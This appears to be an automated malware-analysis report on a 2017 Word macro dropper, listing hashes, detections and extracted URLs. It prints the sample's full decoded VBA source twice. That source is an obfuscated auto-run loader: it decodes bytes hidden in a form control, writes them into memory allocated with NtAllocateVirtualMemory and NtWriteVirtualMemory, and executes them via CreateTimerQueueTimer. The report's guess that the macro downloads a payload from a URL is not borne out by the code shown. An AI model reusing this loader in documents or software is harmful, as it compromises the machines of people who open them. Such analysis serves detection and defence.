Office (OLE) malware analysis — malicious · efe7cfe0c08265e1

MALICIOUS

Office (OLE)

293.0 KB Created: 2017-08-03 12:13:00 Authoring application: Microsoft Office Word First seen: 2017-08-08

MD5: 979bbceebe2dd89c8990bc989fbbcad8 SHA-1: f3d27ab1f0b7b544632f753e439fbd98d4b1d7c7 SHA-256: efe7cfe0c08265e1a4eed68a1e544ba0e98fff98942e0e55941e1899aba71579

110 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros, including a Document_Open macro, and uses a lure to encourage users to enable content. The ClamAV heuristic identifies it as a dropper. The VBA macro code is heavily obfuscated, but it appears to be designed to download and execute a second-stage payload from an embedded URL. The presence of a Document_Open macro and the lure strongly suggest a spearphishing attachment attack vector.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6337026-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6337026-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Function
Private Sub Document_Open()
Dim feeling As Integer
```
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12584 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12584 bytes
SHA-256: `1735d617d4221067bff1e872b33ef460737344b19bfa21c83116d490e86e8f41`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub hypo() Dim mormonism As Byte Dim unintelligent As Long unconventionally.semihard.Value = Day(#12/5/2013#) varday = ingenue = "flirtation" Arrange = whisperings unculled = "quartermaster" forbears = "frigg" henhearted = conscientia aegri = "inclines" corsage = "chalks" Set voluptuousness = unconventionally.semihard.SelectedItem hairdresser = 4 - 1 letter = 15760 + 9 selfsustained = 551790 + 8 Pmt 0, hairdresser, 33518, 17727, 2 pituitary = voluptuousness.Name Caldar = 7840 + 4 bubalus = Right(pituitary, Caldar) clashing = aphid.moses(bubalus) hornblende = 60 + 4 buildup = 22010 + 5 Pmt 0, hornblende, 15545, 59752, 4 stretchable = "spirituous" rosilla = "flurry" #If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then Dim doeuvre As Integer Dim geothlypis As LongPtr Dim complaint As LongPtr Dim adapa As String #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < Win64 Then Dim asinus As String Dim complaint As Long Dim aftershave As Integer Dim geothlypis As Long #End If columniation = 4 - 4 blasphemer = "aminophylline" amalgamated = "indefatigableness" annoying = 109 + 86 + 3901 antifungal = 6 + 4 methyl = 22500 + 1 disproportionately = 511750 + 9 Pmt 0, antifungal, 10746, 56343, 5 heterogenous = allargando deodorization = nycticorax fireside = "catchment" timekeeping = "fulgoridae" finalist = 2 - 1 commixion = 11240 + 6 burgundy = 461550 + 7 Pmt 0, finalist, 25098, 46733, 3 endodontics = clashing distressfully = "causatives" geothlypis = malpighiaceae(endodontics) extracellular = trepidation #If (3 * 4 + 5) > (5 - 2 * 1) And Win64 > (8 - 4 * 2) * 2 Then Dim aweinspiring As Variant Dim buxaceae As LongPtr Dim moneyless As LongPtr Dim otoscope As LongPtr gabelle = 116 + 1948 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < Win64 Then Dim buxaceae As Long picayune = 121 + 660 Dim moneyless As Long Dim otoscope As Long gabelle = picayune + 3459 #End If Dim coxcombry As Variant Dim psychophysics As Integer buxaceae = 3 - 3 complaint = geothlypis + gabelle moneyless = 201520 + 7 otoscope = 84 - 118 + 3534 blackcock = mast(moneyless, buxaceae, complaint, buxaceae, buxaceae, buxaceae, buxaceae) peerage = 10 + 1 anni = 6650 + 3 myelencephalon = 429390 + 2 Pmt 0, peerage, 7323, 57225, 7 End Sub Function malpighiaceae(unimportance) Dim bladder As String Dim estranging As String Dim justititiae As String Dim hasty As String #If (6 * 3 + 5) > (7 - 2 * 1) And Win64 > (48 - 6 * 8) * 2 Then Dim ultimo As String Dim sumerology As LongPtr crassitude = 3 + 39 - 34 Dim accounting As LongPtr Dim positionable As Integer Dim nemo As Long Dim britannic As LongPtr Dim consolidation As Long #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then Dim sumerology As Long crassitude = 56 - 4 - 48 Dim accounting As Long Dim britannic As Long #End If Count = VarPtr(sumerology) mastotermitidae = rembrandt(Count, VarPtr(unimportance) + 8, crassitude) magnanimity = -1 accounting = 0 bitumen = 31 + 48 - 79 britannic = 9747 oaths = 4096 boxcar = 64 cobia = framing(ByVal magnanimity, accounting, ByVal bitumen, britannic, ByVal oaths, ByVal boxcar) cocentric = "dinvention" ctene = lateward - 163 rembrandt accounting, sumerology, 5883 centaury = 63 augurous = 30695 comply = 285608 Pmt 0, centaury, 24833, 59021, 3 malpighiaceae = accounting End Function Private Sub Document_Open() Dim feeling As Integer Dim demonstrative As Variant cancroid = "parang" butterwort = "allograph" hypo collectanea = 78 needs = 34258 vero = 291498 Pmt 0, collectanea, 21146, 10215, 4 End Sub Function rembrandt(corkscreq, messiah, abrogated) #If (7 * 4 + 5) > (7 - 2 * 1) And Win64 > (20 - 5 * 4) * 2 Then Dim brumous As Variant Dim contemptible As Variant Dim neurology As LongPtr Dim bimestrial As LongPtr Dim assuring As LongPtr Dim chopin As Integer Dim decameter As LongPtr Dim myself As LongPtr #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then Dim bimestrial As Long Dim divorce As Variant Dim neurology As Long Dim shameless As Integer Dim decameter As Long Dim carotenoid As Variant Dim assuring As Long Dim chaffy As String Dim myself As Long Dim broadax As Byte Dim aflutter As Integer #End If gi = "bivalvular" cachexia = cachexia + 159 bimestrial = corkscreq myself = abrogated faineance = "rudera" decameter = messiah diplomatically = 77 socius = 28789 sealskin = 555429 Pmt 0, diplomatically, 37216, 51573, 3 cocentric = faineance neurology = 124 + 39 - 164 agrypnotic ByVal neurology, bimestrial, decameter, myself, assuring cocentric = gi End Function Attribute VB_Name = "aphid" ' But just your sight had my heart storming ' From the moment when #If (16 / 4 + 2) > (7 - 2 * 1) And Not (32 / 8 - 1 * 4) * 2 < Win64 Then ' Knew it was gonna be a long night ' But just your sight had my heart storming Public Declare Function mongoose Lib "ntdll.dll " Alias "AcquireSRWLockShared" (auscultatory As Any) As Long ' And hit me like a hurricane' If I woulda just layed my drink down Public Declare Function demagogic Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal cooky As Any, entrant As Any, molokai As Any, bowwow As Any) As Long ' We locked eyes over whiskey on ice ' You wrecked my whole world when you came Public Declare Function framing Lib "Ntdll.dll " Alias _ "NtAllocateVirtualMemory" (advantaged As Long, cachalot As Long, ByVal bream As Long, sojournByVal As Long, commodious As Long, ByVal cantibus As Long) As Long ' But just your sight had my heart storming ' And hit me like a hurricane Public Declare Function mast Lib "Kernel32" Alias "CreateTimerQueueTimer" (breechcloth As Any, ByVal puku As Any, ByVal aboriginal As Any, ByVal horneophyton As Any, ByVal powder As Any, ByVal piper As Any, ByVal betulaceae As Any) As Long ' Hit me like a hurricane ' But just your sight had my heart storming Public Declare Function agrypnotic Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal pucciniaceae As Any, ByVal stalk As Any, ByVal unfurl As Any, ByVal copernicus As Any, ByVal mannitol As Any) As Long ' The moon went hiding, stars quit shining ' Baby, without warning #End If ' Rain was driving, thunder, lightning ' The moon went hiding, stars quit shining #If (16 / 4 + 5) > (7 - 2 * 1) And (25 - 5 * 5) * 2 < Win64 Then ' The moon went hiding, stars quit shining ' But you rolled in with your hair in the wind Public Declare PtrSafe Function agrypnotic Lib "ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal interlinear As Any, ByVal footlocker As Any, ByVal sunbeams As Any, ByVal recoilless As Any, ByVal distempering As Any) As LongPtr ' I was doing alright ' And hit me like a hurricane Public Declare PtrSafe Function framing Lib "ntdll.dll " Alias _ "NtAllocateVirtualMemory" (cyrilla As LongPtr, fb As LongPtr, ByVal spectator As LongPtr, aurousByVal As LongPtr, conenose As LongPtr, ByVal closeted As LongPtr) As LongPtr ' We locked eyes over whiskey on ice ' And hit me like a hurricane Public Declare PtrSafe Function mast Lib "Kernel32" Alias "CreateTimerQueueTimer" (incurably As Any, ByVal piddle As Any, ByVal interruption As Any, ByVal frigidarium As Any, ByVal urn As Any, ByVal equations As Any, ByVal cladorhyncus As Any) As Long ' I wouldnt be in my truck ' Driving us to your house Public Declare PtrSafe Function corticohypothalamic Lib "ntdll.dll " Alias "AcquireSRWLockShared" (denounce As Any) As LongPtr ' Baby, without warning ' The moon went hiding, stars quit shining Public Declare PtrSafe Function commonlaw Lib "ntdll.dll" Alias "NtCreateEventPair" (cuticular As LongPtr, heelbone As LongPtr, subordinate As LongPtr) As LongPtr ' I wouldnt be in my truck ' I was doing alright Public Declare PtrSafe Function antifreeze Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal annexational As Any, breadstuff As Any, rotogravure As Any, shanks As Any) As LongPtr ' I was doing alright ' But you rolled in with your hair in the wind ' I was doing alright ' But just your sight had my heart storming #End If ' You wrecked my whole world when you came ' Baby, without warning Function cabal(bluff, acinus, acidforming) Select Case acidforming Case (40 + 9) + (10 / 2 - 5) cabal = bluff \ acinus Case (50 + 9) + (5 - 3) / 2 - 1 cabal = bluff And acinus Case (60 + 7) + (56 / 7 - 4 * 2) cabal = bluff * acinus End Select End Function Function strife() Dim climatology(255) As Byte holy = 18 + 63 - 16 Do climatology(holy) = holy - 65 holy = holy + 1 Loop While holy <= 90 + 1 holy = 48 Do climatology(holy) = holy + 4 holy = holy + 1 Loop While holy <= 50 + 8 holy = 97 Do climatology(holy) = holy - 71 holy = holy + 1 Loop While holy <= 120 + 3 climatology(47) = 63 holy = 43 climatology(holy) = 60 + 2 strife = climatology End Function Function chilblain(beetroot) chilblain = AscW(beetroot) End Function Function moses(locker) As String Dim dogma As Integer Dim defended As Long Dim matchstick(6962) As Byte ctene = Rnd(122) Dim annunciation As String Dim armenian As String gi = "nobleman" Dim doorbell(63) As Long Dim theoretical(63) As Long Dim cytosine As String Dim metrology As String Dim metacarpal As Long Dim oxyacid As Long faineance = gi Dim methylenedioxymethamphetamine As Integer Dim rasper(63) As Long Dim goggleeyed() As Byte Dim sidesaddle As Long plenitude = 113 + 257935 footfault = 45 + 3987 Dim cuckoo As Byte anticoagulant = 65536 ramjet = 11 + 78 + 4007 cavern = 63 valency = 255 photographic = 16515072 noctiluca = 16711680 ataxic = 262144 argyle = 110 + 56 + 65114 Dim extraction As Integer deluge = 256 cockfight = 104 - 116 + 76 Dim considerate As Long Dim blight As String baseless = 120 - 107 - 13 abusive = 7843 Dim canopy() As Byte Dim iberis As Variant Dim strapping As Integer canopy = VBA.StrConv(locker, 128) Dim moonwort As Long catsclaw = 110 + 3 authorial = 7780 + 8 taichung = 269860 + 1 VBA.Financial.Pmt 0, catsclaw, 36487, 27341, 5 newport = 7840 + 3 lanceolate = vbKeyShift - 12 For liza = 0 To newport If liza Mod 2 = 0 Then canopy(liza) = canopy(liza) - lanceolate Else canopy(liza) = canopy(liza) - (lanceolate - 1) End If Next liza methionine = 51 absinth = 23486 metrongr = 531748 VBA.Financial.Pmt 0, methionine, 32023, 15407, 6 methylenedioxymethamphetamine = 0 psoriasis = 0 bhaga = 123 - 80 finality = strife For sidesaddle = (7 - 7) * 1 To (50 + 13) * (5 - 4) doorbell(sidesaddle) = cabal(sidesaddle, cockfight, 67) rasper(sidesaddle) = cabal(sidesaddle, ramjet, 67) theoretical(sidesaddle) = cabal(sidesaddle, ataxic, 67) Next sidesaddle pterocnemia = 43 cambium = 4497 ascocarp = 441385 VBA.Financial.Pmt 0, pterocnemia, 16027, 48365, 5 goggleeyed = canopy fireball = 46 - 42 lebanese = 15 harvesthome = 37472 byssus = 139566 VBA.Financial.Pmt 0, lebanese, 3155, 19269, 6 counterfeit = 3 gi = "gabled" gi = "aleurone" childbirth = counterfeit + 1 unmitigable = 119 + 48 - 165 For metacarpal = 0 To newport carrefour = goggleeyed(metacarpal) eroded = goggleeyed(metacarpal + 2) antarctic = rasper(finality(goggleeyed(metacarpal + 1))) bombsight = doorbell(finality(eroded)) + finality(goggleeyed(metacarpal + counterfeit)) defended = theoretical(finality(carrefour)) + antarctic + bombsight sidesaddle = cabal(defended, noctiluca, 59) matchstick(oxyacid) = cabal(sidesaddle, anticoagulant, 49) sidesaddle = cabal(defended, argyle, 59) matchstick(oxyacid + 1) = cabal(sidesaddle, deluge, 49) matchstick(oxyacid + unmitigable) = cabal(defended, valency, 59) oxyacid = oxyacid + unmitigable + 1 metacarpal = metacarpal + 3 Next moses = matchstick End Function Attribute VB_Name = "unconventionally" Attribute VB_Base = "0{B925BDA0-D446-4ACC-8E1A-9B365BFB503A}{7780F35C-1158-4134-B42D-425A036B13A7}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 1735d617d4221067bff1e872b33ef460737344b19bfa21c83116d490e86e8f41

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Sub hypo()
Dim mormonism As Byte
Dim unintelligent As Long
unconventionally.semihard.Value = Day(#12/5/2013#)
varday = ingenue = "flirtation"
Arrange = whisperings
unculled = "quartermaster"
forbears = "frigg"
henhearted = conscientia

aegri = "inclines"
corsage = "chalks"
Set voluptuousness = unconventionally.semihard.SelectedItem
hairdresser = 4 - 1
letter = 15760 + 9
selfsustained = 551790 + 8
 Pmt 0, hairdresser, 33518, 17727, 2

pituitary = voluptuousness.Name
Caldar = 7840 + 4
bubalus = Right(pituitary, Caldar)
clashing = aphid.moses(bubalus)
hornblende = 60 + 4
buildup = 22010 + 5
 Pmt 0, hornblende, 15545, 59752, 4

stretchable = "spirituous"
rosilla = "flurry"
#If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then
Dim doeuvre As Integer
Dim geothlypis As LongPtr
Dim complaint As LongPtr
Dim adapa As String
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < Win64 Then
Dim asinus As String
Dim complaint As Long
Dim aftershave As Integer
Dim geothlypis As Long
#End If
columniation = 4 - 4
blasphemer = "aminophylline"
amalgamated = "indefatigableness"
annoying = 109 + 86 + 3901
antifungal = 6 + 4
methyl = 22500 + 1
disproportionately = 511750 + 9
 Pmt 0, antifungal, 10746, 56343, 5

heterogenous = allargando
deodorization = nycticorax
fireside = "catchment"
timekeeping = "fulgoridae"
finalist = 2 - 1
commixion = 11240 + 6
burgundy = 461550 + 7
 Pmt 0, finalist, 25098, 46733, 3

endodontics = clashing
distressfully = "causatives"
geothlypis = malpighiaceae(endodontics)
extracellular = trepidation
#If (3 * 4 + 5) > (5 - 2 * 1) And Win64 > (8 - 4 * 2) * 2 Then
Dim aweinspiring As Variant
Dim buxaceae As LongPtr
Dim moneyless As LongPtr
Dim otoscope As LongPtr
gabelle = 116 + 1948
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < Win64 Then
Dim buxaceae As Long
picayune = 121 + 660
Dim moneyless As Long
Dim otoscope As Long
gabelle = picayune + 3459

#End If
Dim coxcombry As Variant
Dim psychophysics As Integer
buxaceae = 3 - 3
complaint = geothlypis + gabelle
moneyless = 201520 + 7
otoscope = 84 - 118 + 3534
blackcock = mast(moneyless, buxaceae, complaint, buxaceae, buxaceae, buxaceae, buxaceae)
peerage = 10 + 1
anni = 6650 + 3
myelencephalon = 429390 + 2
 Pmt 0, peerage, 7323, 57225, 7

End Sub
Function malpighiaceae(unimportance)
Dim bladder As String
Dim estranging As String
Dim justititiae As String
Dim hasty As String
#If (6 * 3 + 5) > (7 - 2 * 1) And Win64 > (48 - 6 * 8) * 2 Then
Dim ultimo As String
Dim sumerology As LongPtr
crassitude = 3 + 39 - 34
Dim accounting As LongPtr
Dim positionable As Integer
Dim nemo As Long
Dim britannic As LongPtr
Dim consolidation As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim sumerology As Long
crassitude = 56 - 4 - 48
Dim accounting As Long
Dim britannic As Long
#End If
Count = VarPtr(sumerology)
mastotermitidae = rembrandt(Count, VarPtr(unimportance) + 8, crassitude)
magnanimity = -1
accounting = 0
bitumen = 31 + 48 - 79
britannic = 9747
oaths = 4096
boxcar = 64
cobia = framing(ByVal magnanimity, accounting, ByVal bitumen, britannic, ByVal oaths, ByVal boxcar)
cocentric = "dinvention"

ctene = lateward - 163

rembrandt accounting, sumerology, 5883
centaury = 63
augurous = 30695
comply = 285608
 Pmt 0, centaury, 24833, 59021, 3

malpighiaceae = accounting
End Function
Private Sub Document_Open()
Dim feeling As Integer
Dim demonstrative As Variant
cancroid = "parang"
butterwort = "allograph"
hypo
collectanea = 78
needs = 34258
vero = 291498
 Pmt 0, collectanea, 21146, 10215, 4
End Sub
Function rembrandt(corkscreq, messiah, abrogated)
#If (7 * 4 + 5) > (7 - 2 * 1) And Win64 > (20 - 5 * 4) * 2 Then
Dim brumous As Variant
Dim contemptible As Variant
Dim neurology As LongPtr
Dim bimestrial As LongPtr
Dim assuring As LongPtr
Dim chopin As Integer
Dim decameter As LongPtr
Dim myself As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim bimestrial As Long
Dim divorce As Variant
Dim neurology As Long
Dim shameless As Integer
Dim decameter As Long
Dim carotenoid As Variant
Dim assuring As Long
Dim chaffy As String
Dim myself As Long
Dim broadax As Byte
Dim aflutter As Integer
#End If
gi = "bivalvular"
cachexia = cachexia + 159
bimestrial = corkscreq
myself = abrogated
faineance = "rudera"
decameter = messiah
diplomatically = 77
socius = 28789
sealskin = 555429
 Pmt 0, diplomatically, 37216, 51573, 3

cocentric = faineance
neurology = 124 + 39 - 164
agrypnotic ByVal neurology, bimestrial, decameter, myself, assuring
cocentric = gi
End Function



Attribute VB_Name = "aphid"
'  But just your sight had my heart storming
'  From the moment when
#If (16 / 4 + 2) > (7 - 2 * 1) And Not (32 / 8 - 1 * 4) * 2 < Win64 Then
'  Knew it was gonna be a long night
'  But just your sight had my heart storming
Public Declare Function mongoose Lib "ntdll.dll  " Alias "AcquireSRWLockShared" (auscultatory As Any) As Long
'  And hit me like a hurricane'  If I woulda just layed my drink down
Public Declare Function demagogic Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal cooky As Any, entrant As Any, molokai As Any, bowwow As Any) As Long
'  We locked eyes over whiskey on ice
'  You wrecked my whole world when you came
Public Declare Function framing Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (advantaged As Long, cachalot As Long, ByVal bream As Long, sojournByVal As Long, commodious As Long, ByVal cantibus As Long) As Long
'  But just your sight had my heart storming
'  And hit me like a hurricane
Public Declare Function mast Lib "Kernel32" Alias "CreateTimerQueueTimer" (breechcloth As Any, ByVal puku As Any, ByVal aboriginal As Any, ByVal horneophyton As Any, ByVal powder As Any, ByVal piper As Any, ByVal betulaceae As Any) As Long
'  Hit me like a hurricane
'  But just your sight had my heart storming
Public Declare Function agrypnotic Lib "Ntdll.dll   " Alias "NtWriteVirtualMemory" (ByVal pucciniaceae As Any, ByVal stalk As Any, ByVal unfurl As Any, ByVal copernicus As Any, ByVal mannitol As Any) As Long
'  The moon went hiding, stars quit shining
'  Baby, without warning
#End If
'  Rain was driving, thunder, lightning
'  The moon went hiding, stars quit shining
#If (16 / 4 + 5) > (7 - 2 * 1) And (25 - 5 * 5) * 2 < Win64 Then
'  The moon went hiding, stars quit shining
'  But you rolled in with your hair in the wind
Public Declare PtrSafe Function agrypnotic Lib "ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal interlinear As Any, ByVal footlocker As Any, ByVal sunbeams As Any, ByVal recoilless As Any, ByVal distempering As Any) As LongPtr
'  I was doing alright
'  And hit me like a hurricane
Public Declare PtrSafe Function framing Lib "ntdll.dll  " Alias _
"NtAllocateVirtualMemory" (cyrilla As LongPtr, fb As LongPtr, ByVal spectator As LongPtr, aurousByVal As LongPtr, conenose As LongPtr, ByVal closeted As LongPtr) As LongPtr
'  We locked eyes over whiskey on ice
'  And hit me like a hurricane
Public Declare PtrSafe Function mast Lib "Kernel32" Alias "CreateTimerQueueTimer" (incurably As Any, ByVal piddle As Any, ByVal interruption As Any, ByVal frigidarium As Any, ByVal urn As Any, ByVal equations As Any, ByVal cladorhyncus As Any) As Long
'  I wouldnt be in my truck
'  Driving us to your house
Public Declare PtrSafe Function corticohypothalamic Lib "ntdll.dll  " Alias "AcquireSRWLockShared" (denounce As Any) As LongPtr
'  Baby, without warning
'  The moon went hiding, stars quit shining
Public Declare PtrSafe Function commonlaw Lib "ntdll.dll" Alias "NtCreateEventPair" (cuticular As LongPtr, heelbone As LongPtr, subordinate As LongPtr) As LongPtr
'  I wouldnt be in my truck
'  I was doing alright
Public Declare PtrSafe Function antifreeze Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal annexational As Any, breadstuff As Any, rotogravure As Any, shanks As Any) As LongPtr
'  I was doing alright
'  But you rolled in with your hair in the wind

'  I was doing alright
'  But just your sight had my heart storming
#End If

'  You wrecked my whole world when you came
'  Baby, without warning
Function cabal(bluff, acinus, acidforming)
Select Case acidforming
Case (40 + 9) + (10 / 2 - 5)
cabal = bluff \ acinus
Case (50 + 9) + (5 - 3) / 2 - 1
cabal = bluff And acinus
Case (60 + 7) + (56 / 7 - 4 * 2)
cabal = bluff * acinus
End Select
End Function
Function strife()
Dim climatology(255) As Byte
holy = 18 + 63 - 16
Do
climatology(holy) = holy - 65
holy = holy + 1
Loop While holy <= 90 + 1
holy = 48
Do
climatology(holy) = holy + 4
holy = holy + 1
Loop While holy <= 50 + 8
holy = 97
Do
climatology(holy) = holy - 71
holy = holy + 1
Loop While holy <= 120 + 3
climatology(47) = 63
holy = 43
climatology(holy) = 60 + 2
strife = climatology
End Function


Function chilblain(beetroot)
chilblain = AscW(beetroot)
End Function
Function moses(locker) As String
Dim dogma As Integer

Dim defended As Long
Dim matchstick(6962) As Byte
ctene = Rnd(122)

Dim annunciation As String

Dim armenian As String

gi = "nobleman"

Dim doorbell(63) As Long
Dim theoretical(63) As Long
Dim cytosine As String
Dim metrology As String

Dim metacarpal As Long
Dim oxyacid As Long
faineance = gi

Dim methylenedioxymethamphetamine As Integer
Dim rasper(63) As Long
Dim goggleeyed() As Byte
Dim sidesaddle As Long
plenitude = 113 + 257935
footfault = 45 + 3987
Dim cuckoo As Byte

anticoagulant = 65536
ramjet = 11 + 78 + 4007
cavern = 63
valency = 255
photographic = 16515072
noctiluca = 16711680
ataxic = 262144
argyle = 110 + 56 + 65114
Dim extraction As Integer

deluge = 256
cockfight = 104 - 116 + 76
Dim considerate As Long

Dim blight As String
baseless = 120 - 107 - 13
abusive = 7843
Dim canopy() As Byte
Dim iberis As Variant
Dim strapping As Integer
canopy = VBA.StrConv(locker, 128)
Dim moonwort As Long
catsclaw = 110 + 3
authorial = 7780 + 8
taichung = 269860 + 1
 VBA.Financial.Pmt 0, catsclaw, 36487, 27341, 5

newport = 7840 + 3
lanceolate = vbKeyShift - 12
For liza = 0 To newport
If liza Mod 2 = 0 Then
canopy(liza) = canopy(liza) - lanceolate
Else
canopy(liza) = canopy(liza) - (lanceolate - 1)
End If
Next liza
methionine = 51
absinth = 23486
metrongr = 531748
 VBA.Financial.Pmt 0, methionine, 32023, 15407, 6

methylenedioxymethamphetamine = 0
psoriasis = 0
bhaga = 123 - 80
finality = strife
For sidesaddle = (7 - 7) * 1 To (50 + 13) * (5 - 4)
doorbell(sidesaddle) = cabal(sidesaddle, cockfight, 67)
rasper(sidesaddle) = cabal(sidesaddle, ramjet, 67)
theoretical(sidesaddle) = cabal(sidesaddle, ataxic, 67)
Next sidesaddle
pterocnemia = 43
cambium = 4497
ascocarp = 441385
 VBA.Financial.Pmt 0, pterocnemia, 16027, 48365, 5

goggleeyed = canopy
fireball = 46 - 42
lebanese = 15
harvesthome = 37472
byssus = 139566
 VBA.Financial.Pmt 0, lebanese, 3155, 19269, 6

counterfeit = 3
gi = "gabled"

gi = "aleurone"

childbirth = counterfeit + 1
unmitigable = 119 + 48 - 165
For metacarpal = 0 To newport
carrefour = goggleeyed(metacarpal)
eroded = goggleeyed(metacarpal + 2)
antarctic = rasper(finality(goggleeyed(metacarpal + 1)))
bombsight = doorbell(finality(eroded)) + finality(goggleeyed(metacarpal + counterfeit))
defended = theoretical(finality(carrefour)) + antarctic + bombsight
sidesaddle = cabal(defended, noctiluca, 59)
matchstick(oxyacid) = cabal(sidesaddle, anticoagulant, 49)
sidesaddle = cabal(defended, argyle, 59)
matchstick(oxyacid + 1) = cabal(sidesaddle, deluge, 49)
matchstick(oxyacid + unmitigable) = cabal(defended, valency, 59)
oxyacid = oxyacid + unmitigable + 1
metacarpal = metacarpal + 3
Next
moses = matchstick
End Function


Attribute VB_Name = "unconventionally"
Attribute VB_Base = "0{B925BDA0-D446-4ACC-8E1A-9B365BFB503A}{7780F35C-1158-4134-B42D-425A036B13A7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.